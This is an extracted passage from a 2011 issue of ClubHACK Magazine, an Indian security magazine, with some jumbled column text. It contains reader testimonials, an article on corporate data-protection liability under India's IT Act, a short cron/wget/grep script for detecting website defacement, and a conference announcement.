To make it more interesting and cover a wide range of audience, we came up with 5 dedicated sections Tech Gyan, Moms Guide, Tool Gyan, Command Line and Legal Gyan. Initially we wrote a few articles by ourselves. Since we are also students, it was hard to manage college and magazine work at the same time. But as the time progressed professionals from the industry started to contribute. Many of them wanted to publish their papers in our magazine and we are glad they chose our magazine as platform to publish their work. Main contribution comes from the security professionals. But contribution has also come from security enthusiasts and students.

Issue 13 Feb 2011| Page - 24

There are of International contributors as well. In fact they are quite well known in the circle, namely, Raoul Chiesa (Senior Advisor of UNICRI), Dror Shalev and Oren Barad. And it was a great achievement for us to have one of its issue released by the famous security guru Bruce Schneier. Good news! We are coming out with a couple of new sections. One section being Events, wherein we will be covering various security events through our CHMag. Second is more of a secret right now. If we disclose it here, tiger will kill us! ;-) Stay tuned with us for more updates on this secret.

month along with the magazine, Rohit Srivastwa and his team in one year made an excellent job, dealing with the Technology, Tools, the lovely "Mom's Guide", the legal aspects and the Command Line tutorials. All of us from the InfoSec community should be thanksful to ClubHACK Magazine! -Raoul "Nobody" Chiesa
Ethical Hacker, Cybercrime Senior Advisor at the United Nations (UNICRI)

Testimonials
Here are few testimonials from the experts, contributors and readers. "Thousands may claim to be the first, but everyone knows - who is the first, the best, and provides you with the latest no doubt its the one and only ClubHack Magazine. I am extremely happy to see the dedicated, committed and quality work by the CHMag Team. I am sure that they will continue to deliver up-to-date and rich content in the coming days to quench our lust for knowledge. Wishing all the very best to CHMag Team Happy Hacking :) " - Manu Zacharia
MVP (Enterprise Security), ISLA-2010 (ISC), C|EH, C|HFI, CCNA, MCP, AFCEH Certified ISO 27001:2005 LA

"The content covered in CHMag interests a wide range of audience, providing valuable information for the novice and a handy reference to the geeks. This drive has educated and inspired tons of people from across the world. Proud to be a part of team ClubHACK". - Tushar Dalvi,
Information Security Institute. Johns Hopkins University.

Well, beside having been the "2010 Santa Claus" for ClubHACK Magazine, I do always totally enjoy reading each new issue:-) Aside from those incredibly smart security posters that came out every

When I come to know about CHMag, I was eager to see whether what actually these guys are going to publish. I was really amazed by looking at classification of articles in sections like Tech Gyan, Tool Gyan, Legal Gyan, etc. That's what CHMag did well. it is really easy for me to read articles as per out interests in computer security. Everything is here on CHMag. Also CHMag members provides opportunity to publish article written by readers as well. I have posted one for them and looking forward to post again for CHMag. I congratulate all the ClubHACK guys for such a GREAT initiative in computer security field and wish them to be number 1 in the world... - Sagar Nangare
Web developer, SEO expert.

Issue 13 Feb 2011 | Page - 25

ClubHack magazine is the work of a young and passionate team. The magazines are zero BS and 100% useful content. I have been lucky enough to meet the guys behind the show and they are as cool as the mag itself. Great show guys!" - Lava Kumar
Penetration Tester, Security Researcher.

I look forward to read the ClubHack magazine every month. Their topics are structured and well laid out. Their authors have definite deep knowledge of in the topics they write. wishing CHmag a happy birthday and looking forward more editions in years to come. -Prasanna Kanagasabai
Independent Information Security researcher

Varun Hirve Pankit Thakkar varun@chmag.in pankit@chmag.in

Co-founders, CHMag

We are glad to see that many of the security professionals have chosen us as an authentic platform to publish their papers. This over whelming response from the community has kept us going and we will keep doing our best in the pursuit of excellence in cyber security. It is the moment of great rejoices for us and our salute to all our supporters. We thank you for your support.

Issue 13 Feb 2011| Page - 26

Data Protection and Corporate Liability

India The Emerging IT super power
In the recent years India has emerged as one of the preferred destinations for offshore business in outsourcing, financial, educational, legal, banking, healthcare, marketing and telecommunication services. The factors that have turned India into one of the hotspots for offshore outsourcing are the educated and unemployed masses, enterprising nature of Indians who have excellent spoken English skills and relatively cheap labour. Business Process Outsourcing, popularly called BPO is the industry which is multiplying by the day in India.

The Black side

In April 2005, five employees of MsourcE in Pune were arrested for allegedly pulling off a fraud worth nearly Rs 2.5 crore from Citibank accounts of four New York-based account holders. In June 2005, the British tabloid Sun conducted a sting operation by purchasing the bank account details of 1,000 Britons for about 5.50 dollars each from Karan Bahree, an employee of Gurgaon-based BPO Company Infinity E-Search. Similarly, in June 2006, Nadeem Kashmiri, an employee at HSBC's call center in Bangalore, sold the customers credit card information to a group of scamsters who used the information to siphon off nearly Rs 1.8 crore from bank accounts of UK-based customers. In another 3 months, the Channel 4 data theft scandal has hit the

Issue 13 Feb 2011 | Page - 27

headlines, and coincidentally, it was also UK based. All these incidents sparked off a debate among the offshore industry circles, media and the legal world as to how safe foreign data is in Indian hands. The discussions were also veered towards the need for some kind of protection for personal data in India which is currently absent. Cyber security to has be a always critical been area and for

implementing and maintaining reasonable security practices and procedures and thereby causes wrongful loss or wrongful gain to any person, such body corporate shall be liable to pay damages by way of compensation to the person so affected. Explanation. For the purposes of this section, (i) Body corporate refers to any company and includes a firm, sole proprietorship or any other association of individuals who engaged in commercial or professional activities; (ii) reasonable security practices and procedures means security practices and procedures information designed from to protect such access, unauthorized

continues

organizations and will continue to increase in importance as attacks become stealthier, have a greater financial impact on an organization, damage. and cause reputational

The Law
It is significant to note that by the recent amendments to the Information Technology Act, 2000, Indian Government has provided a new legal direction to data protection and privacy. Two new Sections have been inserted by the amendment that focuses on corporate liability in case of breach of privacy. These are:Sec. 43A Compensation for failure to protect data Where a body corporate, possessing, dealing or handling any sensitive personal data or information in a computer resource which it owns, controls or operates, is negligent in

damage, use, modification, disclosure or impairment, as may be specified in an agreement between the parties or as may be specified in any law for the time being in force and in the absence of such agreement or any law, such reasonable security practices and procedures, as may be prescribed by the Central Government in consultation with such professional bodies or associations as it may deem fit; (iii) sensitive personal data or information means such personal information as may be prescribed by the Central Government in consultation with such professional bodies or associations as it may deem fit.

Issue 13 Feb 2011| Page - 28

Here, amount of damages to be paid by the way of compensation is unlimited.

Sec. 72A Punishment for disclosure of information contract in breach of lawful

Power

of

adjudication

of

offences

Same as otherwise provided in this Act or any other law for the time being in force, any person including an intermediary who, while providing services under the terms of lawful contract, has secured access to any material containing personal information about another person, with the intent to cause or knowing that he is likely to cause wrongful loss or wrongful gain discloses, without the consent of the person concerned, or in breach of a lawful contract, such material to any other person, shall be punished with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both. This Section specifically imposes liability on intermediary, or any person or a corporate body which discloses personal information of users while providing services under lawful contract. Hence now Banks, BPOs, Call centers, ISPs, Mobile Network Service providers etc are under legal a scanner to maintain the privacy of customers private data. Illustration:Lex Experts, an LPO (Legal Process Outsourcing Company) is working on the introduction of an IPO (Initial Public Offer) of a company. While working on it, they had

committed under Sec. 43A is with the Adjudicating Officer if the amount of compensation claimed is upto Rupees Five Crore; if it is above Rupees Five Crore then it is with the Civil Court. This Section imposes liability on corporate entities to ensure adoption of Reasonable Security Practices for the protection of Sensitive customers. Hence, Banks, Call centers, BPOs, etc are under legal scanner to ensure adoption of reasonable security practices to maintain secrecy of data otherwise they will be legally liable to pay damages. Illustration:Some employees of a famous multinational bank leaked out sensitive personal information of its customers without their consent. In such a case, the bank can be held liable under this Section for failure to adopt reasonable protection Information. security of the practices Sensitive for the Personal Personal Information of

Issue 13 Feb 2011 | Page - 29

access to confidential financial information about a company including Balance-sheets of previous financial years, list of Creditors, Shareholding pattern of a Company, etc which is supposed to be kept in privacy. Some employees of that LPO leaked out this confidential information to a rival company in return of huge amount of money. In this case, they can be held liable under Section contract. Power of adjudication of offence committed under Section 72A First is with Judicial or Magistrate Cities). Class 72A in for disclosure of of information breach lawful

legislation per se. It does not lay down any specific data protection or privacy principles. It is a generic legislation, which focuses on many issues.

Sagar Rahukar sr@asianlaws.org

Sagar Rahukar, a Law graduate, is Head(Maharashtra) at Asian School of Cyber Laws. Sagar specializes in Cyber Law, Intellectual Property Law and Corporate Law. Sagar also teaches law at numerous educational institutes and has also trained officials from various law enforcement agencies.

Metropolitan Magistrate (In Metro

Conclusion
The recent amendments in the Information Technology Act, 2000 have introduced the concept of Data privacy in India for the first time. Prior to this there were no express provisions for Data Privacy. As per the amendments, corporate bodies now are under obligation to ensure the adoption of reasonable security practices for prevention of misuse of data. However, law is still not clear about defining what reasonable security practices are? Additionally, The Information Technology Act, 2000 is not data a or privacy protection

Issue 13 Feb 2011| Page - 30

Monitor Your Website

While the whole issue was talking about web security, I thought of writing something on the same lines In this issue of command line gyan, well see how we can monitor our websites automatically so as to get notified if anyone defaces it. Nothing very great in this and there are a lot of services giving this feature in cheap, but the fun is to write your own dirty little script to help you. So here it goes

So now well see how we can use them together to achieve our objective wget http://chmag.in Will download the homepage of CHMag website. This will produce some verbose noise, so we can use wget q to run in quite mode grep Welcome to CHMag Will search for the text Now if we club them together wget q http://chmag.in | grep Welcome to CHMag This will download the homepage & search for the text. No this will not :) This will download the file & grep will not get anything. So well have to redirect the output of wget to standard output & then grep it This makes the command to look like

Linux
We are going to use few tiny commands of Linux to make our monitoring utility a) Wget it downloads a file from web b) Mail it sends mail c) Cron it runs scheduled task repetitively d) Grep our best text search friend

Issue 13 Feb 2011 | Page - 31

wget q O - http://chmag.in | grep Welcome to CHMag Now suppose the website is not available due to some web attack which may include DOS, complete homepage defacement, server crash or In such cases youll not be able to download the actual page with your text on it and we can use that logic to create an alert. So now we have added a if, then, else logic here if [[ `wget -q -O http://chmag.in/ | grep "Welcome to CHMag"` == "" ]]; then echo .Something is wrong. ; fi OK perfect, this helps. But do we need to run it every time we need to check the website? No, lets put this in cron job & make a mail alert Thats easy Simply create a new CRON entry which looks like this

This will not work if only a part of your website is defaced leaving around your original text, such as someone managing to write a malicious post on your blog by getting SQL injection or some other web attack somehow, not deleting the core content. In such cases you can look for specific words such as hacked & then raise an alert. CHMag for sure cant use this keyword & you know why

Windows
Sorry, the work is not that easy here. I havent tried a lot on windows cause such things suits on a linux environment only. Having said that let me tell you that its not impossible to use it on windows. Option : Best one would be cygwin :D OR Wget windows binary Grep can be replaced by find command (tedious job here) Tools like bmail can be used to send mails from command line in windows Schedule tasks can also be created So now its your homework to create a windows alternative to this Linux fun monitoring job & send us an article, well cover the same in our next issue Happy monitoring

MAILTO=you@someotherdomain.com 10 * * * * if [[ `wget -q -O http://chmag.in/|grep "Welcome to CHMag"` == "" ]]; then echo .Something is Wrong.; fi

Now your cron task will run 10th minute of every hour and send you a mail if anything is wrong with the website. This is just a brain teaser for you, you can use your own imagination now to twist it to suit your need better.

Rohit Srivastwa
rohit@clubhack.com

Issue 13 Feb 2011| Page - 32

n|uCON 25-26th Feb, Goa

null The open security community (registered non-profit society) is back with the second edition of nullcon Goa International Security Conference. We are proud to inform you that we have become the largest and the most talked about security conference by sticking to our core values i.e. providing latest and cutting edge research in information security in a vendor neutral environment. We invite you to join us at Goa and experience the future of information security.

Registration
http://nullcon.net/register (online offline) and

Events
CXO Track Talks with focus on Business angle to security for CXOs/managers Tech Track Deep knowledge research talks focusing on infosec and latest hacker techniques Workshop Workshops on Latest Research in malware and open source intelligence Battle Underground Capture the flag at nullcon.1st Prize - SANS Hacking class worth USD $4095 Mehfil-E-Mausiqi null Networking Party

Date
25-26thFeb 2011

Venue
The RETREAT by Zuri, Pedda, Uttor Doxi, Varca, Salcete, Goa 403 721

Issue 13 Feb 2011 | Page - 33

STATUTORY WARNING: nullcon can cause severe exposure to high octane Gyan and could leave participants exhausted with wild shack parties. Beware, Be There.

Note: - If you want to cover your Hacking/Security event mail us at info@chmag.in

Issue 2 Mar 2010 | Page - 1